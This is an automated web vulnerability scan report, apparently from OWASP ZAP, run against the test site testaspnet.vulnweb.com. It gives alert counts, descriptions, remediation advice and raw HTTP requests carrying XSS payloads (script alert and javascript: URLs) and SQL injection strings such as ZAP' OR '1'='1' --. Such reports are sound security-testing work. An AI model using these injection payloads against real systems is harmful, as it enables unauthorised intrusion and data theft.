About this report
Report parameters
Contexts
No contexts were selected, so all contexts were included by default.
Sites
The following sites were included:
- http://testaspnet.vulnweb.com
(If no sites were selected, all sites were included by default.)
An included site must also be within one of the included contexts for its data to be included in the report.
Risk levels
Included: High, Medium, Low, Informational
Excluded: None
Confidence levels
Included: User Confirmed, High, Medium, Low
Excluded: User Confirmed, High, Medium, Low, False Positive
Summaries
Alert counts by risk and confidence
| Risk \ Confidence | User Confirmed | High | Medium | Low | Total |
|---|---|---|---|---|---|
| High | 0 (0.0%) | 0 (0.0%) | 6 (3.3%) | 15 (8.2%) | 21 (11.5%) |
| Medium | 0 (0.0%) | 0 (0.0%) | 26 (14.2%) | 0 (0.0%) | 26 (14.2%) |
| Low | 0 (0.0%) | 29 (15.8%) | 99 (54.1%) | 4 (2.2%) | 132 (72.1%) |
| Informational | 0 (0.0%) | 0 (0.0%) | 0 (0.0%) | 4 (2.2%) | 4 (2.2%) |
| Total | 0 (0.0%) | 29 (15.8%) | 131 (71.6%) | 23 (12.6%) | 183 (100%) |
Alert counts by site and risk
| Site | High (= High) | Medium (>= Medium) | Low (>= Low) | Informational (>= Informational) |
|---|---|---|---|---|
| http://testaspnet.vulnweb.com | 21 (21) | 26 (47) | 132 (179) | 4 (183) |
Alert counts by alert type
| Alert type | Risk | Count |
|---|---|---|
| Cross Site Scripting (Persistent) | High | 1 (0.5%) |
| Cross Site Scripting (Reflected) | High | 3 (1.6%) |
| SQL Injection | High | 2 (1.1%) |
| Viewstate without MAC Signature (Unsure) | High | 15 (8.2%) |
| X-Frame-Options Header Not Set | Medium | 26 (14.2%) |
| Cookie without SameSite Attribute | Low | 2 (1.1%) |
| Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) | Low | 38 (20.8%) |
| Timestamp Disclosure - Unix | Low | 4 (2.2%) |
| X-AspNet-Version Response Header | Low | 29 (15.8%) |
| X-Content-Type-Options Header Missing | Low | 34 (18.6%) |
| Absence of Anti-CSRF Tokens | Low | 25 (13.7%) |
| Charset Mismatch (Header Versus Meta Content-Type Charset) | Informational | 4 (2.2%) |
| Total | | 183 |
Alerts
- Risk=High, Confidence=Medium (6)
  - http://testaspnet.vulnweb.com (6)
    - Cross Site Scripting (Persistent) (1)
      GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags
Alert description
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Other info
Source URL: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Content-Length: 0
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:07:41 GMT
Content-Length: 35389
Response body (35389 bytes)
Parameter
tbComment
Attack
</div><script>alert(1);</script><div>
Solution
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
Cross Site Scripting (Reflected) (3)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
Alert tags
Alert description
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request
Request line and header section (377 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Content-Length: 0
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:07:27 GMT
Content-Length: 30484
Response body (30484 bytes)
Parameter NewsAd
Attack javascript:alert(1);
Evidence javascript:alert(1);
Solution
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags
Alert description
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request
Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Content-Length: 1784
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1784 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%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&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Fpbihq93nLJJrCcGURk6iWNCIK%2BA%3D%3D&tbComment=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E&btnSend=Send+comment
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:07:15 GMT
Content-Length: 34006
Response body (34006 bytes)
Parameter tbComment
Attack </div><scrIpt>alert(1);</scRipt><div>
Evidence </div><scrIpt>alert(1);</scRipt><div>

Solution
Phase: Architecture and Design
同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
Alert tags
Alert description Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request Request line and header section (472 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Content-Length: 10989
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10989 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:07:20 GMT
Content-Length: 30520
Response body (30520 bytes)
Parameter NewsAd
Attack javascript:alert(1);
Evidence javascript:alert(1);
Solution
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
SQL Injection (2)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2
Alert tags
Alert description SQL injection may be possible.
Other info The original page results were successfully replicated using the expression [4-2] as the parameter value
The parameter value being modified was stripped from the HTML output for the purposes of the comparison
Request Request line and header section (343 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Content-Length: 0
Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:08:37 GMT
Content-Length: 39227
Response body (39227 bytes)
Parameter id
Attack 4-2
Solution Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description SQL injection may be possible.
Other info The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' OR '1'='1' -- ]
The parameter value being modified was stripped from the HTML output for the purposes of the comparison
Data was NOT returned for the original parameter.
The vulnerability was detected by successfully retrieving more data than originally returned, by manipulating the parameter
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/login.aspx
Content-Length: 1226
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1226 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:08:04 GMT
Content-Length: 13298
Response body (13298 bytes)
Parameter tbUsername
Attack ZAP' OR '1'='1' --
Solution Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
Risk=High, Confidence=Low (15)
http://testaspnet.vulnweb.com (15)
Viewstate without MAC Signature (Unsure) (15)
GET http://testaspnet.vulnweb.com
Alert tags
Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:16 GMT
Content-Length: 13912
Response body (13912 bytes)
Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/
Alert tags
Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:15 GMT
Content-Length: 13912
Response body (13912 bytes)
